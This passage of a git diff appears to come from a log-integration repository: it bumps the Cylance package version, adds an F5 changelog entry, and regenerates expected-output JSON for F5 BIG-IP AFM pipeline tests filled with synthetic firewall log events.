"2021-12-14T14:42:47.135093203Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/cylance/manifest.yml b/packages/cylance/manifest.yml index bbaaa58bfca..b990439b3e1 100644 --- a/packages/cylance/manifest.yml +++ b/packages/cylance/manifest.yml 
@@ -1,7 +1,7 @@ format_version: 1.0.0 name: cylance title: CylanceProtect Logs -version: 0.6.0 +version: 0.6.1 description: Collect logs from CylanceProtect devices with Elastic Agent. categories: ["security"] release: experimental diff --git a/packages/f5/changelog.yml b/packages/f5/changelog.yml index 9c93b228f3a..13198a4c5bc 100644 --- a/packages/f5/changelog.yml +++ b/packages/f5/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.7.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.7.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/f5/data_stream/bigipafm/_dev/test/pipeline/test-generated.log-expected.json b/packages/f5/data_stream/bigipafm/_dev/test/pipeline/test-generated.log-expected.json index cbe228732ff..56ea4c285d7 100644 --- a/packages/f5/data_stream/bigipafm/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/f5/data_stream/bigipafm/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "iusm modtempo olab6078.home olaboris tur itv [F5@odoco acl_policy_name=ria acl_policy_type=min acl_rule_name=ite action=Closed hostname=tatemac3541.api.corp bigip_mgmt_ip=10.228.193.207 context_name=liqua context_type=ciade date_time=Jan 29 2016 06:09:59 dest_ip=10.125.114.51 dst_geo=umq dest_port=2288 device_product=pexe device_vendor=nes device_version=1.2262 drop_reason=reveri errdefs_msgno=boNemoe errdefs_msg_name=equepor flow_id=eni ip_protocol=ipv6 severity=low partition_name=ehend route_domain=ritquiin sa_translation_pool=umqui sa_translation_type=reeufugi source_ip=10.208.121.85 src_geo=sperna source_port=884 source_user=billoi translated_dest_ip=10.165.201.71 translated_dest_port=6153 translated_ip_protocol=tatemU translated_route_domain=deF translated_source_ip=10.11.196.142 translated_source_port=5222 translated_vlan=iatnu vlan=3810", "event": { - "ingested": "2021-06-09T10:31:51.965162300Z" + "ingested": "2021-12-14T14:42:50.150073469Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eporr quipexe alo4540.example umdo itessequ vol [F5@luptat acl_policy_name=isiutal acl_policy_type=moenimi acl_rule_name=mod action=Established hostname=enatus2114.mail.home bigip_mgmt_ip=10.51.132.10 context_name=utper context_type=squame date_time=Feb 12 2016 13:12:33 dest_ip=10.173.116.41 dst_geo=iin dest_port=6287 device_product=emape device_vendor=aer device_version=1.445 drop_reason=nse errdefs_msgno=eumiu errdefs_msg_name=uame flow_id=quis ip_protocol=tcp severity=medium partition_name=cca route_domain=dolo sa_translation_pool=meumfug sa_translation_type=tetu source_ip=10.162.9.235 src_geo=tionulam source_port=2548 source_user=byC translated_dest_ip=10.94.67.230 translated_dest_port=783 translated_ip_protocol=atio translated_route_domain=uipexea translated_source_ip=10.92.202.200 
translated_source_port=6772 translated_vlan=eFini vlan=859", "event": { - "ingested": "2021-06-09T10:31:51.965186700Z" + "ingested": "2021-12-14T14:42:50.150076237Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "exe iatu ionofde2424.api.invalid rsitam ommodic mipsu [F5@consec acl_policy_name=taliquip acl_policy_type=psumq acl_rule_name=atcup action=Reject hostname=gelit6728.api.invalid bigip_mgmt_ip=10.122.116.161 context_name=uam context_type=untutl date_time=Feb 26 2016 20:15:08 dest_ip=10.40.68.117 dst_geo=uptassi dest_port=3179 device_product=scivel device_vendor=aqui device_version=1.4726 drop_reason=iveli errdefs_msgno=llumd errdefs_msg_name=enatuse flow_id=magn ip_protocol=icmp severity=low partition_name=eos route_domain=enimad sa_translation_pool=rmagni sa_translation_type=sit source_ip=10.209.155.149 src_geo=tenima source_port=1073 source_user=seq translated_dest_ip=10.82.56.117 translated_dest_port=2935 translated_ip_protocol=veleumi translated_route_domain=tia translated_source_ip=10.191.68.244 translated_source_port=6905 translated_vlan=veri vlan=5990", "event": { - "ingested": "2021-06-09T10:31:51.965194200Z" + "ingested": "2021-12-14T14:42:50.150076741Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "siutaliq exercit tempor4496.www.localdomain eip lupta iusmodt [F5@doloreeu acl_policy_name=pori acl_policy_type=occ acl_rule_name=ect action=Accept hostname=uid545.www5.localhost bigip_mgmt_ip=10.12.44.169 context_name=autfu context_type=natura date_time=Mar 12 2016 03:17:42 dest_ip=10.163.217.10 dst_geo=untNequ dest_port=5075 device_product=nimadmin device_vendor=erep device_version=1.2696 drop_reason=temq errdefs_msgno=ugiatqu errdefs_msg_name=eacomm flow_id=Utenimad ip_protocol=igmp severity=high partition_name=ehend route_domain=ueipsaqu sa_translation_pool=uidolore 
sa_translation_type=niamqu source_ip=10.202.66.28 src_geo=tevelit source_port=5098 source_user=elits translated_dest_ip=10.131.233.27 translated_dest_port=5037 translated_ip_protocol=ari translated_route_domain=eataevit translated_source_ip=10.50.112.141 translated_source_port=7303 translated_vlan=dmi vlan=499", "event": { - "ingested": "2021-06-09T10:31:51.965202700Z" + "ingested": "2021-12-14T14:42:50.150077132Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mquisnos loremagn iciade3433.example enimad incididu eci [F5@aali acl_policy_name=ametcons acl_policy_type=porainc acl_rule_name=amquisno action=Established hostname=emquiavo452.internal.localhost bigip_mgmt_ip=10.151.111.38 context_name=tvol context_type=moll date_time=Mar 26 2016 10:20:16 dest_ip=10.228.149.225 dst_geo=ema dest_port=5969 device_product=tquovol device_vendor=ntsuntin device_version=1.3341 drop_reason=tatno errdefs_msgno=imav errdefs_msg_name=ididu flow_id=ciunt ip_protocol=ipv6-icmp severity=very-high partition_name=emqu route_domain=lit sa_translation_pool=iam sa_translation_type=qua source_ip=10.159.182.171 src_geo=umdolore source_port=6680 source_user=mol translated_dest_ip=10.96.35.212 translated_dest_port=3982 translated_ip_protocol=rumet translated_route_domain=oll translated_source_ip=10.206.197.113 translated_source_port=4075 translated_vlan=temUten vlan=4125", "event": { - "ingested": "2021-06-09T10:31:51.965209500Z" + "ingested": "2021-12-14T14:42:50.150077545Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iqu ollit usan6343.www5.domain olo uaera sitas [F5@ehenderi acl_policy_name=pidatat acl_policy_type=gni acl_rule_name=tquiinea action=Drop hostname=sun1403.www.invalid bigip_mgmt_ip=10.126.177.162 context_name=eriame context_type=lorema date_time=Apr 09 2016 17:22:51 dest_ip=10.213.82.64 dst_geo=rnatura 
dest_port=3007 device_product=ddoeiu device_vendor=enb device_version=1.6179 drop_reason=onse errdefs_msgno=liq errdefs_msg_name=metcon flow_id=smo ip_protocol=igmp severity=medium partition_name=emporinc route_domain=untutlab sa_translation_pool=tem sa_translation_type=ons source_ip=10.213.113.28 src_geo=ali source_port=6446 source_user=ist translated_dest_ip=10.169.144.147 translated_dest_port=2399 translated_ip_protocol=nibus translated_route_domain=edquiano translated_source_ip=10.89.163.114 translated_source_port=5166 translated_vlan=par vlan=686", "event": { - "ingested": "2021-06-09T10:31:51.965215100Z" + "ingested": "2021-12-14T14:42:50.150077956Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rveli rsint omm4276.www.example onofd taed lup [F5@remeumf acl_policy_name=antiumto acl_policy_type=strude acl_rule_name=ctetura action=Closed hostname=ittenbyC7838.api.localdomain bigip_mgmt_ip=10.18.124.28 context_name=ido context_type=paqu date_time=Apr 24 2016 00:25:25 dest_ip=10.158.194.3 dst_geo=qua dest_port=2945 device_product=quip device_vendor=oin device_version=1.6316 drop_reason=elaudant errdefs_msgno=tinvol errdefs_msg_name=dolore flow_id=abor ip_protocol=udp severity=medium partition_name=etc route_domain=etM sa_translation_pool=nimadmin sa_translation_type=ditautfu source_ip=10.146.88.52 src_geo=entsu source_port=5364 source_user=rudexerc translated_dest_ip=10.101.223.43 translated_dest_port=6494 translated_ip_protocol=quam translated_route_domain=adm translated_source_ip=10.103.107.47 translated_source_port=6094 translated_vlan=Nemoen vlan=2827", "event": { - "ingested": "2021-06-09T10:31:51.965221Z" + "ingested": "2021-12-14T14:42:50.150078353Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "icab mwr fugi4637.www.lan imadmini ntutla equa [F5@mexercit acl_policy_name=dtem 
acl_policy_type=tasuntex acl_rule_name=sunt action=Reject hostname=ume465.corp bigip_mgmt_ip=10.189.109.245 context_name=emaperi context_type=tame date_time=May 08 2016 07:27:59 dest_ip=10.83.234.60 dst_geo=ivelits dest_port=712 device_product=iusmodt device_vendor=etdolo device_version=1.3768 drop_reason=lorumw errdefs_msgno=ommod errdefs_msg_name=sequatur flow_id=uidolo ip_protocol=ipv6-icmp severity=high partition_name=nihi route_domain=Lor sa_translation_pool=itecto sa_translation_type=erc source_ip=10.69.57.206 src_geo=olupt source_port=5979 source_user=onse translated_dest_ip=10.110.99.17 translated_dest_port=6888 translated_ip_protocol=ostrume translated_route_domain=molest translated_source_ip=10.150.220.75 translated_source_port=1298 translated_vlan=tisetq vlan=5372", "event": { - "ingested": "2021-06-09T10:31:51.965226Z" + "ingested": "2021-12-14T14:42:50.150078749Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ici giatquov eritquii3561.www.example taut oreseos uames [F5@tati acl_policy_name=utaliqu acl_policy_type=oriosamn acl_rule_name=deFinibu action=Drop hostname=iciatisu1463.www5.localdomain bigip_mgmt_ip=10.153.136.222 context_name=tem context_type=est date_time=May 22 2016 14:30:33 dest_ip=10.176.205.96 dst_geo=nidolo dest_port=3409 device_product=taliq device_vendor=intoccae device_version=1.2299 drop_reason=dolo errdefs_msgno=Loremip errdefs_msg_name=idolor flow_id=emeumfu ip_protocol=ipv6-icmp severity=very-high partition_name=lupt route_domain=psaquae sa_translation_pool=oinBCSe sa_translation_type=mnisist source_ip=10.199.34.241 src_geo=amvolup source_port=7700 source_user=temveleu translated_dest_ip=10.19.194.101 translated_dest_port=3605 translated_ip_protocol=numqu translated_route_domain=qui translated_source_ip=10.121.219.204 translated_source_port=3496 translated_vlan=utali vlan=3611", "event": { - "ingested": "2021-06-09T10:31:51.965231Z" + 
"ingested": "2021-12-14T14:42:50.150079142Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reetd lumqui itinvo7084.mail.corp equep iavolu den [F5@tutla acl_policy_name=olorema acl_policy_type=iades acl_rule_name=siarchi action=Reject hostname=aliqu6801.api.localdomain bigip_mgmt_ip=10.46.27.57 context_name=ihilm context_type=atDu date_time=Jun 05 2016 21:33:08 dest_ip=10.128.232.208 dst_geo=usmodt dest_port=1837 device_product=run device_vendor=mque device_version=1.4138 drop_reason=quirat errdefs_msgno=llu errdefs_msg_name=licab flow_id=eirure ip_protocol=rdp severity=medium partition_name=oidentsu route_domain=atiset sa_translation_pool=atu sa_translation_type=umexerci source_ip=10.64.141.105 src_geo=iadese source_port=2374 source_user=ice translated_dest_ip=10.57.103.192 translated_dest_port=2716 translated_ip_protocol=oei translated_route_domain=tlabori translated_source_ip=10.182.199.231 translated_source_port=1426 translated_vlan=data vlan=4478", "event": { - "ingested": "2021-06-09T10:31:51.965236400Z" + "ingested": "2021-12-14T14:42:50.150079551Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nnum eritqu uradip7152.www5.home luptasn hitect dol [F5@leumiu acl_policy_name=namali acl_policy_type=taevit acl_rule_name=rinrepre action=Closed hostname=itame189.domain bigip_mgmt_ip=10.32.67.231 context_name=estia context_type=eaq date_time=Jun 20 2016 04:35:42 dest_ip=10.66.80.221 dst_geo=serunt dest_port=7865 device_product=texp device_vendor=tMalor device_version=1.7410 drop_reason=emoe errdefs_msgno=eaq errdefs_msg_name=amest flow_id=corp ip_protocol=tcp severity=low partition_name=rehender route_domain=iae sa_translation_pool=dantiumt sa_translation_type=luptasn source_ip=10.164.6.207 src_geo=olestiae source_port=5485 source_user=pic translated_dest_ip=10.160.210.31 
translated_dest_port=7741 translated_ip_protocol=duntut translated_route_domain=magni translated_source_ip=10.3.134.237 translated_source_port=3156 translated_vlan=radipisc vlan=7020", "event": { - "ingested": "2021-06-09T10:31:51.965244Z" + "ingested": "2021-12-14T14:42:50.150079950Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "fficiade uscipit vitaedi1318.corp temqu edol colab [F5@ommodico acl_policy_name=quatD acl_policy_type=mcolab acl_rule_name=neav action=Established hostname=tsedqu2456.www5.invalid bigip_mgmt_ip=10.182.178.217 context_name=tlab context_type=volupt date_time=Jul 04 2016 11:38:16 dest_ip=10.188.169.107 dst_geo=beata dest_port=6448 device_product=fdeFi device_vendor=texp device_version=1.3545 drop_reason=etdol errdefs_msgno=uela errdefs_msg_name=boN flow_id=eprehend ip_protocol=tcp severity=medium partition_name=aboN route_domain=ihilmo sa_translation_pool=radi sa_translation_type=gel source_ip=10.235.101.253 src_geo=veniam source_port=2400 source_user=giatnu translated_dest_ip=10.42.138.192 translated_dest_port=3403 translated_ip_protocol=quioffi translated_route_domain=uptate translated_source_ip=10.201.6.10 translated_source_port=6608 translated_vlan=sequa vlan=2851", "event": { - "ingested": "2021-06-09T10:31:51.965249Z" + "ingested": "2021-12-14T14:42:50.150080511Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ate aliquam nimid893.mail.corp umwr oluptate issus [F5@osamn acl_policy_name=isnisiu acl_policy_type=bore acl_rule_name=tsu action=Closed hostname=stlabo1228.mail.host bigip_mgmt_ip=10.151.161.70 context_name=edo context_type=asia date_time=Jul 18 2016 18:40:50 dest_ip=10.108.167.93 dst_geo=enderit dest_port=5858 device_product=essecil device_vendor=citation device_version=1.3795 drop_reason=eco errdefs_msgno=Utenimad errdefs_msg_name=orpor flow_id=tlabo 
ip_protocol=rdp severity=low partition_name=emvel route_domain=tmollita sa_translation_pool=fde sa_translation_type=nsecte source_ip=10.22.102.198 src_geo=eroi source_port=176 source_user=nse translated_dest_ip=10.194.247.171 translated_dest_port=4940 translated_ip_protocol=mquisnos translated_route_domain=maven translated_source_ip=10.86.101.235 translated_source_port=3266 translated_vlan=lapar vlan=1024", "event": { - "ingested": "2021-06-09T10:31:51.965254Z" + "ingested": "2021-12-14T14:42:50.150081568Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tfu udan orema6040.api.corp mveleu nofdeFin sequam [F5@temvel acl_policy_name=ris acl_policy_type=nisi acl_rule_name=dant action=Reject hostname=ecte4762.local bigip_mgmt_ip=10.204.35.15 context_name=quidolor context_type=tessec date_time=Aug 02 2016 01:43:25 dest_ip=10.135.160.125 dst_geo=mve dest_port=513 device_product=itatio device_vendor=uta device_version=1.4901 drop_reason=sintoc errdefs_msgno=volupt errdefs_msg_name=siste flow_id=uiinea ip_protocol=icmp severity=low partition_name=volupta route_domain=rcitati sa_translation_pool=eni sa_translation_type=ionevo source_ip=10.174.252.105 src_geo=sperna source_port=5368 source_user=mnisi translated_dest_ip=10.107.168.60 translated_dest_port=2227 translated_ip_protocol=oinBC translated_route_domain=quameius translated_source_ip=10.167.172.155 translated_source_port=3544 translated_vlan=etdo vlan=706", "event": { - "ingested": "2021-06-09T10:31:51.965258900Z" + "ingested": "2021-12-14T14:42:50.150081986Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ese isaute ptatemq95.api.host Nequepo ipsumd ntocc [F5@uteirure acl_policy_name=nevo acl_policy_type=ide acl_rule_name=aali action=Drop hostname=smo7167.www.test bigip_mgmt_ip=10.214.249.164 context_name=tco context_type=uae date_time=Aug 16 2016 
08:45:59 dest_ip=10.187.20.98 dst_geo=quinesc dest_port=6218 device_product=santiumd device_vendor=turadip device_version=1.3427 drop_reason=niamqui errdefs_msgno=orem errdefs_msg_name=sno flow_id=atno ip_protocol=ipv6-icmp severity=high partition_name=volu route_domain=nonn sa_translation_pool=inventor sa_translation_type=quiavol source_ip=10.99.249.210 src_geo=iatisu source_port=6684 source_user=upta translated_dest_ip=10.182.191.174 translated_dest_port=1759 translated_ip_protocol=adm translated_route_domain=leumiur translated_source_ip=10.81.26.208 translated_source_port=7651 translated_vlan=isc vlan=5933", "event": { - "ingested": "2021-06-09T10:31:51.965264Z" + "ingested": "2021-12-14T14:42:50.150082376Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tobea tor qui4499.api.local fugiatn docon etconsec [F5@ios acl_policy_name=evolu acl_policy_type=ersp acl_rule_name=tquov action=Drop hostname=sauteiru4554.api.domain bigip_mgmt_ip=10.220.5.143 context_name=com context_type=tnulapa date_time=Aug 30 2016 15:48:33 dest_ip=10.108.85.148 dst_geo=eriti dest_port=2201 device_product=norum device_vendor=madmi device_version=1.1766 drop_reason=sequatu errdefs_msgno=quameius errdefs_msg_name=nisiuta flow_id=roid ip_protocol=icmp severity=very-high partition_name=eprehen route_domain=entor sa_translation_pool=xeacomm sa_translation_type=nihil source_ip=10.101.226.128 src_geo=rsitv source_port=3087 source_user=porro translated_dest_ip=10.88.101.53 translated_dest_port=2458 translated_ip_protocol=tatemUt translated_route_domain=modtemp translated_source_ip=10.201.238.90 translated_source_port=2715 translated_vlan=remag vlan=3759", "event": { - "ingested": "2021-06-09T10:31:51.965268700Z" + "ingested": "2021-12-14T14:42:50.150082767Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ccaecat tquiin 
tse4198.www.localdomain ptasn taedicta itam [F5@str acl_policy_name=idolore acl_policy_type=pid acl_rule_name=illoin action=Reject hostname=untut4046.internal.domain bigip_mgmt_ip=10.217.150.196 context_name=uine context_type=udant date_time=Sep 13 2016 22:51:07 dest_ip=10.183.59.41 dst_geo=untu dest_port=5676 device_product=ven device_vendor=con device_version=1.7491 drop_reason=amnih errdefs_msgno=ium errdefs_msg_name=esciuntN flow_id=idunt ip_protocol=udp severity=low partition_name=rQu route_domain=oremeu sa_translation_pool=laudant sa_translation_type=isnost source_ip=10.157.18.252 src_geo=itess source_port=52 source_user=evit translated_dest_ip=10.30.133.66 translated_dest_port=1921 translated_ip_protocol=velitse translated_route_domain=oditem translated_source_ip=10.243.218.215 translated_source_port=662 translated_vlan=rsitvolu vlan=3751", "event": { - "ingested": "2021-06-09T10:31:51.965273600Z" + "ingested": "2021-12-14T14:42:50.150083392Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sumdolor meaqueip npr4414.api.localdomain boNem ess ipisci [F5@gitsed acl_policy_name=tqu acl_policy_type=reprehen acl_rule_name=trumexer action=Accept hostname=quid3147.mail.home bigip_mgmt_ip=10.66.181.6 context_name=epre context_type=tobeata date_time=Sep 28 2016 05:53:42 dest_ip=10.181.53.249 dst_geo=iduntu dest_port=1655 device_product=temUt device_vendor=avol device_version=1.752 drop_reason=essequam errdefs_msgno=acommo errdefs_msg_name=nturma flow_id=str ip_protocol=ipv6 severity=high partition_name=etur route_domain=itecto sa_translation_pool=reetdol sa_translation_type=totamre source_ip=10.148.161.250 src_geo=ciadeser source_port=6135 source_user=adipisc translated_dest_ip=10.181.133.187 translated_dest_port=1079 translated_ip_protocol=aquioffi translated_route_domain=tamet translated_source_ip=10.167.227.44 translated_source_port=6595 translated_vlan=eFi vlan=6733", "event": { 
- "ingested": "2021-06-09T10:31:51.965278300Z" + "ingested": "2021-12-14T14:42:50.150083795Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "its ender riamea1540.www.host seq tutlab sau [F5@atevelit acl_policy_name=meius acl_policy_type=billo acl_rule_name=labo action=Reject hostname=umdolo1029.mail.localhost bigip_mgmt_ip=10.54.17.32 context_name=orumSe context_type=ratv date_time=Oct 12 2016 12:56:16 dest_ip=10.119.81.180 dst_geo=psaquaea dest_port=1348 device_product=nts device_vendor=siut device_version=1.5663 drop_reason=ano errdefs_msgno=piscinge errdefs_msg_name=tvol flow_id=velitess ip_protocol=ipv6 severity=high partition_name=uunturm route_domain=temUte sa_translation_pool=sit sa_translation_type=olab source_ip=10.84.163.178 src_geo=ima source_port=2031 source_user=mquisno translated_dest_ip=10.107.9.163 translated_dest_port=5433 translated_ip_protocol=eacommod translated_route_domain=ctetura translated_source_ip=10.74.11.43 translated_source_port=55 translated_vlan=seosqui vlan=6797", "event": { - "ingested": "2021-06-09T10:31:51.965282900Z" + "ingested": "2021-12-14T14:42:50.150084185Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uradi tot llamco7206.www.home oremagna ncididun umSe [F5@xeacomm acl_policy_name=cinge acl_policy_type=itla acl_rule_name=iamquis action=Accept hostname=lorsita2019.internal.home bigip_mgmt_ip=10.192.229.221 context_name=ect context_type=modocons date_time=Oct 26 2016 19:58:50 dest_ip=10.199.194.188 dst_geo=odoconse dest_port=228 device_product=quatu device_vendor=veli device_version=1.5726 drop_reason=nonp errdefs_msgno=labo errdefs_msg_name=ulapar flow_id=aboreetd ip_protocol=igmp severity=low partition_name=llitanim route_domain=invo sa_translation_pool=hit sa_translation_type=urv source_ip=10.112.32.213 src_geo=runtmol source_port=1749 
source_user=odi translated_dest_ip=10.184.73.211 translated_dest_port=6540 translated_ip_protocol=esseci translated_route_domain=tametcon translated_source_ip=10.230.129.252 translated_source_port=3947 translated_vlan=isis vlan=4917", "event": { - "ingested": "2021-06-09T10:31:51.965287800Z" + "ingested": "2021-12-14T14:42:50.150084590Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "utlab emUteni rum959.host velillu cteturad bor [F5@rauto acl_policy_name=ationev acl_policy_type=umdolor acl_rule_name=uaUten action=Reject hostname=paquioff624.mail.invalid bigip_mgmt_ip=10.161.148.64 context_name=ibusBon context_type=ven date_time=Nov 10 2016 03:01:24 dest_ip=10.162.114.217 dst_geo=doloreme dest_port=60 device_product=onemulla device_vendor=evitaed device_version=1.1721 drop_reason=suntin errdefs_msgno=itse errdefs_msg_name=umexerc flow_id=oremipsu ip_protocol=ipv6-icmp severity=medium partition_name=amco route_domain=ssecillu sa_translation_pool=liqua sa_translation_type=olo source_ip=10.199.216.143 src_geo=fdeF source_port=593 source_user=ccaeca translated_dest_ip=10.198.213.189 translated_dest_port=5024 translated_ip_protocol=remagn translated_route_domain=mquae translated_source_ip=10.7.200.140 translated_source_port=3298 translated_vlan=olupt vlan=2189", "event": { - "ingested": "2021-06-09T10:31:51.965292900Z" + "ingested": "2021-12-14T14:42:50.150085014Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "edquiac urerepr eseru4234.mail.example qua rsita ate [F5@ipsamvo acl_policy_name=onula acl_policy_type=miu acl_rule_name=rationev action=Reject hostname=mex2054.mail.corp bigip_mgmt_ip=10.65.232.27 context_name=ica context_type=lillum date_time=Nov 24 2016 10:03:59 dest_ip=10.199.40.38 dst_geo=taedicta dest_port=3409 device_product=poriss device_vendor=tvolup device_version=1.1000 
drop_reason=siu errdefs_msgno=snost errdefs_msg_name=tpersp flow_id=llamc ip_protocol=tcp severity=very-high partition_name=mvel route_domain=nof sa_translation_pool=usmodi sa_translation_type=mvolu source_ip=10.206.96.56 src_geo=aincidu source_port=2687 source_user=uaeab translated_dest_ip=10.128.157.27 translated_dest_port=1493 translated_ip_protocol=etdolor translated_route_domain=lupta translated_source_ip=10.22.187.69 translated_source_port=3590 translated_vlan=oremi vlan=1485", "event": { - "ingested": "2021-06-09T10:31:51.965298300Z" + "ingested": "2021-12-14T14:42:50.150085407Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nbyCi tevel usc5760.www5.localdomain cab atisund xea [F5@ites acl_policy_name=isetq acl_policy_type=iutali acl_rule_name=velite action=Closed hostname=avolupt7576.api.corp bigip_mgmt_ip=10.194.210.62 context_name=porincid context_type=atisetqu date_time=Dec 08 2016 17:06:33 dest_ip=10.51.213.42 dst_geo=dipisci dest_port=3449 device_product=ilmol device_vendor=eri device_version=1.3104 drop_reason=ueipsa errdefs_msgno=tae errdefs_msg_name=autodit flow_id=elit ip_protocol=udp severity=high partition_name=plica route_domain=ore sa_translation_pool=quidolor sa_translation_type=inven source_ip=10.71.114.14 src_geo=itsedd source_port=3010 source_user=admin translated_dest_ip=10.68.253.120 translated_dest_port=481 translated_ip_protocol=est translated_route_domain=uptatemU translated_source_ip=10.183.130.225 translated_source_port=5693 translated_vlan=item vlan=2738", "event": { - "ingested": "2021-06-09T10:31:51.965303300Z" + "ingested": "2021-12-14T14:42:50.150085810Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dat periam dqu6144.api.localhost dutpers erun orisn [F5@reetd acl_policy_name=prehen acl_policy_type=ntutlabo acl_rule_name=iusmodte action=Established 
hostname=loi7596.www5.home bigip_mgmt_ip=10.31.177.226 context_name=deserun context_type=esseq date_time=Dec 23 2016 00:09:07 dest_ip=10.209.157.8 dst_geo=giatquov dest_port=1918 device_product=enderi device_vendor=ptatem device_version=1.341 drop_reason=fugi errdefs_msgno=labo errdefs_msg_name=nostrud flow_id=gnaal ip_protocol=ggp severity=medium partition_name=cupi route_domain=tame sa_translation_pool=atione sa_translation_type=lores source_ip=10.45.253.103 src_geo=uii source_port=5923 source_user=remagn translated_dest_ip=10.47.255.237 translated_dest_port=2311 translated_ip_protocol=uuntur translated_route_domain=enderit translated_source_ip=10.107.45.175 translated_source_port=4185 translated_vlan=rumSecti vlan=4593", "event": { - "ingested": "2021-06-09T10:31:51.965309100Z" + "ingested": "2021-12-14T14:42:50.150086308Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "atise tate onevo4326.internal.local isnost olorem ido [F5@emqu acl_policy_name=riss acl_policy_type=iquamqua acl_rule_name=sit action=Reject hostname=nsequat1971.internal.invalid bigip_mgmt_ip=10.225.212.189 context_name=mven context_type=olorsit date_time=Jan 06 2017 07:11:41 dest_ip=10.121.239.183 dst_geo=illu dest_port=4875 device_product=turadip device_vendor=tatevel device_version=1.1607 drop_reason=ptassita errdefs_msgno=its errdefs_msg_name=lore flow_id=idol ip_protocol=igmp severity=high partition_name=isn route_domain=sBono sa_translation_pool=loremqu sa_translation_type=tetur source_ip=10.213.94.135 src_geo=tMal source_port=2607 source_user=dquia translated_dest_ip=10.55.105.113 translated_dest_port=3214 translated_ip_protocol=tatione translated_route_domain=nimveni translated_source_ip=10.44.58.106 translated_source_port=1241 translated_vlan=quid vlan=4814", "event": { - "ingested": "2021-06-09T10:31:51.965314600Z" + "ingested": "2021-12-14T14:42:50.150086714Z" + }, + "ecs": { + "version": "1.12.0" 
}, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eporroq ulla iqu4614.www5.example abore squ uiadol [F5@Duisa acl_policy_name=lupta acl_policy_type=aUt acl_rule_name=boNem action=Reject hostname=ectiono2241.lan bigip_mgmt_ip=10.2.114.9 context_name=rehende context_type=velillu date_time=Jan 20 2017 14:14:16 dest_ip=10.94.139.127 dst_geo=mUten dest_port=1812 device_product=quidolor device_vendor=oqu device_version=1.51 drop_reason=tlaboree errdefs_msgno=norumet errdefs_msg_name=dtempo flow_id=tin ip_protocol=tcp severity=high partition_name=imad route_domain=tinvolup sa_translation_pool=tsed sa_translation_type=inv source_ip=10.163.209.70 src_geo=atu source_port=4718 source_user=olabor translated_dest_ip=10.69.161.78 translated_dest_port=1282 translated_ip_protocol=iruredol translated_route_domain=incidid translated_source_ip=10.255.74.136 translated_source_port=5902 translated_vlan=eaqueips vlan=6396", "event": { - "ingested": "2021-06-09T10:31:51.965319700Z" + "ingested": "2021-12-14T14:42:50.150087122Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "volupta dmi untexpl2847.www5.local eiusmod emoe uiinea [F5@mnisiut acl_policy_name=avolu acl_policy_type=Except acl_rule_name=olup action=Closed hostname=umetMal1664.mail.lan 